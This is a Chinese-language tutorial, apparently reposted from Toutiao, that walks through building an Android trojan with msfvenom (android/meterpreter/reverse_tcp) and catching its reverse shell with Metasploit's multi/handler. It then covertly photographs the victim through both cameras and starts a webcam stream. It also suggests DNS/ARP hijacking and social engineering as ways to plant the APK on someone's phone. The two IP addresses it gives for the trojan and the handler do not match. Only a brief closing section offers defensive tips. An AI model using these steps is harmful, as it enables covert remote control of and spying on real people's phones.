免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!
MSF是Metasploit的简称,Metasploit是一款开源的安全漏洞检测工具,非常强大,分别有Windows版和Linux版,工具里集成了许多微软公布的漏洞(0day)。 我这里做测试的系统是Backbox linux ,这是一款网络渗透,信息安全评估系统。里边安装了许许多多的工具。其中MSF就自带有。当然还有其它的 比如Kali linux 、Back Track这些等等。
环境:Backbox linux+MSF 目标:一台安卓手机
既然是入侵安卓手机,肯定要先配置一个安卓木马,那我们看看本机的IP ![]() 本机IP:192.168.1.6 在到终端输入命令:msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=5555 R > /root/apk.apk 以前的MSF老版本是用msfpayload生成木马 现在在新版本中都用msfvenom代替了,所以有些朋友在终端输入msfpayload的时候 会提示 msfpayload无法找到命令 所以使用msfvenom即可,这里LHOST 对应的是本机的IP地址 LPORT对应你要监听的端口 然后生成木马的路径 ![]() 这样我们就在/root/路径下生成了一个APK的安卓木马文件,至于木马的免杀暂且不谈。现在我们在来启动MSF工具 输入命令:msfconsole ![]() 然后输入: 1. use exploit/multi/handler 加载模块 2. set payload android/meterpreter/reverse_tcp 选择Payload 3.show options 查看参数设置 ![]() 我们看见payload里边有两个参数要设置 LHOST和LPORT 表示地址和端口 默认的端口是4444 现在我们来更改设置 1.set LHOST 192.168.1.6 这里的地址设置成我们刚才生成木马的IP地址 2.set LPORT 5555 这里的端口设置成刚才我们生成木马所监听的端口 3.exploit 开始执行漏洞 开始监听... ![]() OK,一切准备工作准备就绪。。。现在要做的就是把木马文件搞到人家的手机上,思路有很多 可以DNS arp劫持欺骗 只要对方用手机下载文件 就会下载我们的木马文件 还有社工什么等等的,这里我就简单的把木马文件弄我自己的手机上做测试 ![]() ![]()
![]() 安装完成后 会在桌面上生成一个MainActivity的程序图标 这个就是我们刚才生成的木马 当我们点击了这个图标 手机会没有任何反应 其实木马已经开始运行起来了 我们可以在我们的MSF里看见有一个会话连接了 ![]() 这样对方的手机就就被我们控制了,查看手机系统信息,输入命令 sysinfo ![]() webcam_list查看手机摄影头有几个 这里显示两项 分别表示有前后两个摄像头 ![]() webcam_snap 隐秘拍照功能 后边跟上参数-i 指定使用那个摄像头拍照 可以看见我们分别对前后摄像头都拍了照 保存到了桌面上 还可以输入命令 webcam_stream 开启摄像头 当我们手机被植入了这种木马时。首先去看手机的运行软件里面有没有不是你安装运行的软件,用电量是否比平时要大很多。手机有莫名的卡顿感! 还有就是从根源上拒绝下载来历不明的软件,当然下载软件也要从正规的途径下载,当有些朋友可能觉得下载一个很常见的软件被中木马了。是因为你随意下载的软件被捆绑了恶意木马,都是静默安装的木马。还有一些从备注名称上给大家一个烟雾弹。所以大家一定一定要从正规平台下载软件,同时下载杀毒软件(当然杀毒软件不是万能的,大部分是有免杀的,不过至少多一层防护多一分安心) 希望全民提高网络安全意识! |
小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪! 本文出自:https://www.toutiao.com/a6616648683205165575/ 免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作! |